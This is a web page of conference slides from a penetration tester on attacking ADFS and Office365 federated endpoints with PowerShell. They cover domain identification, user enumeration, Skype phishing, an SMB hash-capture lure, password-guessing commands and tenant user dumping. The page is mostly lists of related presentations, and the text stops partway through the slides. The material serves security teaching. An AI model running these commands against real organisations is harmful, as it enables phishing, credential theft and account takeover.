Türkiye Sosyal Medya Pazarlama TrendleriTürkiye Sosyal Medya Pazarlama Trendleri
Türkiye Sosyal Medya Pazarlama TrendleriErol Dizdar
 
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...Erol Dizdar
 
Normshield - Cloud Based Vulnerability Scan Service
Normshield - Cloud Based Vulnerability Scan Service Normshield - Cloud Based Vulnerability Scan Service
Normshield - Cloud Based Vulnerability Scan Service BGA Cyber Security
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaBGA Cyber Security
 
Never Settle: Reloaded
Never Settle: ReloadedNever Settle: Reloaded
Never Settle: ReloadedErol Dizdar
 

Viewers also liked (20)

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
GRE Nedir
GRE NedirGRE Nedir
GRE Nedir
 
State of the Global Mobile Consumer: Connectivity is core
State of the Global Mobile Consumer: Connectivity is coreState of the Global Mobile Consumer: Connectivity is core
State of the Global Mobile Consumer: Connectivity is core
 
Model relational
Model relationalModel relational
Model relational
 
Vim Cheatsheet penguen-efendi.com
Vim Cheatsheet penguen-efendi.comVim Cheatsheet penguen-efendi.com
Vim Cheatsheet penguen-efendi.com
 
ISTSEC 2013 - Garibanın APT Tespit Aracı
ISTSEC 2013 - Garibanın APT Tespit AracıISTSEC 2013 - Garibanın APT Tespit Aracı
ISTSEC 2013 - Garibanın APT Tespit Aracı
 
Simtech mobil yarış simulatörü platformu
Simtech mobil yarış simulatörü platformuSimtech mobil yarış simulatörü platformu
Simtech mobil yarış simulatörü platformu
 
DevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
DevOps ile Siber Tehditler Karşısında 360 Derece Alan HakimiyetiDevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
DevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
 
Facebook'taki Türk Bankaları
Facebook'taki Türk BankalarıFacebook'taki Türk Bankaları
Facebook'taki Türk Bankaları
 
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
 
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecekYurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
 
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
 
Turkcell maxi iq
Turkcell maxi iqTurkcell maxi iq
Turkcell maxi iq
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet AraştırmasıISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
 
Türkiye Sosyal Medya Pazarlama Trendleri
Türkiye Sosyal Medya Pazarlama TrendleriTürkiye Sosyal Medya Pazarlama Trendleri
Türkiye Sosyal Medya Pazarlama Trendleri
 
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
 
Normshield - Cloud Based Vulnerability Scan Service
Normshield - Cloud Based Vulnerability Scan Service Normshield - Cloud Based Vulnerability Scan Service
Normshield - Cloud Based Vulnerability Scan Service
 
Jmeter ile uygulama katmanında yük testi gerçekleştirme
Jmeter ile uygulama katmanında yük testi gerçekleştirmeJmeter ile uygulama katmanında yük testi gerçekleştirme
Jmeter ile uygulama katmanında yük testi gerçekleştirme
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
 
Never Settle: Reloaded
Never Settle: ReloadedNever Settle: Reloaded
Never Settle: Reloaded
 

Similar to Attacking ADFS Endpoints with PowerShell Scripts

Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconKarl Fosaaen
 
Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016Karl Fosaaen
 
Integrating your on-premises Active Directory with Azure and Office 365
Integrating your on-premises Active Directory with Azure and Office 365Integrating your on-premises Active Directory with Azure and Office 365
Integrating your on-premises Active Directory with Azure and Office 365nelmedia
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityCloudVillage
 
Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure Jethro Seghers
 
Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure Jethro Seghers
 
Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...
Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...
Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...Jason Himmelstein
 
WIN401_Migrating Microsoft Applications to AWS
WIN401_Migrating Microsoft Applications to AWSWIN401_Migrating Microsoft Applications to AWS
WIN401_Migrating Microsoft Applications to AWSAmazon Web Services
 
Cloud Based Rights Management with Azure RMS
Cloud Based Rights Management with Azure RMSCloud Based Rights Management with Azure RMS
Cloud Based Rights Management with Azure RMSMorgan Simonsen
 
01 introduction to entity framework
01 introduction to entity framework01 introduction to entity framework
01 introduction to entity frameworkMaxim Shaptala
 
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017Amazon Web Services
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingNetSPI
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Emerson Eduardo Rodrigues Von Staffen
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...Amazon Web Services
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
It's just Skype for Business - THOTCON
It's just Skype for Business - THOTCONIt's just Skype for Business - THOTCON
It's just Skype for Business - THOTCONKarl Fosaaen
 

Similar to Attacking ADFS Endpoints with PowerShell Scripts (20)

Externally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - ArcticconExternally Testing Modern AD Domains - Arcticcon
Externally Testing Modern AD Domains - Arcticcon
 
Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016Automating Attacks Against Office365 - BsidesPDX 2016
Automating Attacks Against Office365 - BsidesPDX 2016
 
Integrating your on-premises Active Directory with Azure and Office 365
Integrating your on-premises Active Directory with Azure and Office 365Integrating your on-premises Active Directory with Azure and Office 365
Integrating your on-premises Active Directory with Azure and Office 365
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates SecurityKeynote - Cloudy Vision: How Cloud Integration Complicates Security
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
 
Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure
 
Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure Supporting architecture office 365 on windows azure
Supporting architecture office 365 on windows azure
 
Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...
Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...
Navigating the turbulence on takeoff: Setting up SharePoint on Azure IaaS the...
 
WIN401_Migrating Microsoft Applications to AWS
WIN401_Migrating Microsoft Applications to AWSWIN401_Migrating Microsoft Applications to AWS
WIN401_Migrating Microsoft Applications to AWS
 
Cloud Based Rights Management with Azure RMS
Cloud Based Rights Management with Azure RMSCloud Based Rights Management with Azure RMS
Cloud Based Rights Management with Azure RMS
 
01 introduction to entity framework
01 introduction to entity framework01 introduction to entity framework
01 introduction to entity framework
 
01 introduction to entity framework
01 introduction to entity framework01 introduction to entity framework
01 introduction to entity framework
 
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
Microsoft Workloads on AWS - AWS Public Sector Summit Singapore 2017
 
Windows Azure Essentials V3
Windows Azure Essentials V3Windows Azure Essentials V3
Windows Azure Essentials V3
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration Testing
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
It's just Skype for Business - THOTCON
It's just Skype for Business - THOTCONIt's just Skype for Business - THOTCON
It's just Skype for Business - THOTCON
 

Recently uploaded

Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 

Recently uploaded (20)

Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 

Attacking ADFS Endpoints with PowerShell Scripts

  • 1. Attacking ADFS Endpoints with PowerShell Karl Fosaaen
  • 2. Introductions • Who am I? ‒Karl Fosaaen • What do I do? ‒Wear lots of hats ‒Pen Testing ‒Password Cracking ‒Social Engineering ‒Blog ‒DEF CON Swag Goon ‒Pinball Repair
  • 4. Slides Overview • ADFS Overview • Attack Walkthroughs ‒ Identifying Federated Endpoints ‒ Setting Up Your Test Environment ‒ User Enumeration ‒ Email Validation and Social Engineering Recon ‒ Skype Message Phishing ‒ Dictionary Attacks Against Federated Accounts ‒ Enumeration of Other Federated Domain Users ‒ Pivoting to the Internal Network • Attack Mitigations • Conclusions/Questions
  • 6. ADFS Overview Active Directory Federation Services (AD FS) “is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet.” Source: https://msdn.microsoft.com/en-us/library/bb897402.aspx
  • 7. ADFS Overview Some Terms: ‒ IdP ‒ SAML ‒ WS-Federation ‒ WS-Trust ‒ ADAL
  • 8. ADFS Overview Federation can mean many things ‒ Domain to Domain ‒ Domain to Microsoft ‒ Arbitrary meanings based off of forum posts
  • 9. ADFS Overview Frequently Federated Services • Office365 • Skype for Business • Exchange • Azure AD • SharePoint • Apps in General
  • 10. Attack Walkthroughs • Identifying Federated Endpoints • Setting Up Your Test Environment • User Enumeration • Email Validation and Social Engineering Recon • Skype Message Phishing • Dictionary Attacks Against Federated Accounts • Enumeration of Other Federated Domain Users • Pivoting to the Internal Network
  • 12. Identifying Federated Endpoints Side Note: • Office365 had an Authentication Bypass issue ‒ Insecure SAML assertions ‒ Affected all federated Office365 domains ‒ They called out this method in their blog post Source: http://www.economyofmechanism.com/office365- authbypass.html
  • 13. Identifying Federated Endpoints • Using Microsoft Online
  • 14. Identifying Federated Endpoints • Example user check request
  • 15. Identifying Federated Endpoints • Microsoft’s Responses ‒ Federated Domain ‒ Microsoft Managed Domain
  • 16. ADFS Overview Diagram of (Managed) O365 federation
  • 17. ADFS Overview Diagram of (Federated) O365 federation
  • 18. Identifying Federated Endpoints • Let’s wrap it in a PowerShell script ‒ Federated Domain ‒ Microsoft Managed Domain https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 19. Identifying Federated Endpoints • Multiple domains at once https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 20. Identifying Federated Endpoints • Using DNS TXT records
  • 21. Identifying Federated Endpoints • Using DNS TXT records • Look for the MS=* records
  • 22. Identifying Federated Endpoints • What about the top 1 million Alexa sites? ‒ 47,455 (4.7%) of the top 1 Million have “ms=ms*” records • DNS can be a pain at a million records *Still better than a million HTTP requests to Microsoft • Other options ‒ ADFS.domain.com ‒ STS.domain.com
  • 23. Setting Up Your Test Environment
  • 24. Setting Up Your Test Environment • Basic Overview ‒ Buy/Have a domain ‒ Set up/Purchase Skype for Business* ‒ Install Skype for Business Client* ‒ Install Lync 2013 SDK* ‒ Get the NetSPI PowerShell Modules ‒ Install Azure AD PowerShell module *Note: This is only needed for testing federated Skype for Business
  • 25. Setting Up Your Test Environment • Buy your domain
  • 26. Setting Up Your Test Environment • Get hosted Office365 services ‒ Or set up your own server
  • 27. Setting Up Your Test Environment • Add your domain to the Office365 portal
  • 28. Setting Up Your Test Environment • Set up your user and enable federation
  • 29. Setting Up Your Test Environment • Install Skype for Business and the Lync SDK ‒ Requires Visual Studio 2010 for the easiest install https://www.microsoft.com/en-us/download/details.aspx?id=36824
  • 30. Setting Up Your Test Environment • Login to Skype for Business as your user
  • 31. Setting Up Your Test Environment • Grab the PowerShell modules from NetSPI • https://github.com/NetSPI/PowerShell/blob/master/Power Skype.ps1 • https://github.com/NetSPI/PowerShell/blob/master/Get- ADFSEndpoint.ps1
  • 32. Setting Up Your Test Environment • Install the Azure AD PowerShell Module • https://msdn.microsoft.com/en- us/library/azure/jj151815(v=azure.98).aspx
  • 34. User Enumeration • We have: ‒ Some Targets/Endpoints ‒ A testing environment • We need: ‒ Some users to attack • Enumerate some users for the organization off of LinkedIn • Use one of the many recon frameworks • Check out the User enumeration work that nyxgeek spoke about on Friday
  • 36. Email Validation and SE Recon • Using our federated Skype, we can find information about other federated Skype users • Just open a chat with them
  • 37. Email Validation and SE Recon • Or we can just chat with these CEOs
  • 38. Email Validation and SE Recon • Let’s just wrap it with PowerShell instead Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
  • 40. Email Validation and SE Recon Demo • Get-SkypeStatus -inputFile "C:TempLiveAdmins.txt" | ft -AutoSize • It helps if we run it a couple of times…
  • 42. Email Validation and SE Recon • What about the top 1 million Alexa sites • Of those 47,455 “ms=ms*” records ‒ 45 have “Administrator” accounts that have federated Skype for Business accounts ‒ None of those were actively online during testing… ‒ From nyxgeek: • 38,658 (3.8%) have hostname http://lyncdiscover.domain.com • 486 of 995 unique (Fortune 1000 - 2015) domain names • Note: ‒ Skype doesn’t like opening 2,000+ conversations at a time
  • 44. Skype Message Phishing Send-SkypeMessage -email test@example.com -message "What's your password?" Get-SkypeStatus -inputFile 'C:Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage …
  • 45. Email Validation and SE Recon Demo • Get-SkypeStatus -email karl.fosaaen@netspi.com • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello from Derbycon" • for ($i = 0; $i -lt 10; $i++){Invoke- SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
  • 48. Email Validation and SE Recon Demo • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com - message "192.168.1.123test” • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com - message “www.microsoftsupport.online" • SMB capture/relay running on internal network • UNC works on internal, HRefs work for external • Send this message out to a group, get or relay hashes
  • 49. Skype Message Phishing • Further Work ‒ Grab a domains worth of phone numbers • Got this working while making these slides… • Should work if you already have creds ‒ Brute-Forcing Skype Creds • Not easy with the Lync SDK • Nyxgeek has some great methods that will be added to PowerSkype
  • 51. Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Federated Domain
  • 52. Dictionary Attacks Against ADFS • Invoke-ADFSSecurityTokenRequest* Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://adfs.example.com/ -AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed -UserName 'karl.fosaaen‘ -Password 'Winter2016‘ -Domain ‘example.com‘ -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security- token-with-powershell/
  • 53. Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Microsoft Managed Domain
  • 54. Dictionary Attacks Against ADFS • Connect-msolservice – AzureAD PS Module
  • 56. Enumeration of Other Domain Users • Not totally necessary, but it can be handy 1. $msolcred = get-credential 2. connect-msolservice -credential $msolcred 3. Get-MsolUser -All | ft –AutoSize • This also works for apps using AzureAD for account management
  • 57. Enumeration of Other Domain Users • Using the Graph API
  • 58. Enumeration of Other Domain Users • Using the Graph API $token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users ‒ This works for federated and managed domains • Github – https://github.com/NetSPI/PowerShell/blob/master/Get- GraphAPIToken.ps1
  • 59. Enumeration of Other Domain Users Demo • $token = Get-GraphAPIToken -TenantName microsoftsupport.online • Get-GraphData -Token $token -Tenant microsoftsupport.online -Resource users
  • 60. Enumeration of Other Domain Users
  • 61. Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains • If the domain uses Office365, you can connect to it with PowerShell
  • 62. Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains (1/2) $PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText –Force $credentials = New-Object -TypeName "System.Management.Automation.PSCredential " -ArgumentList "test@example.com", $PWord
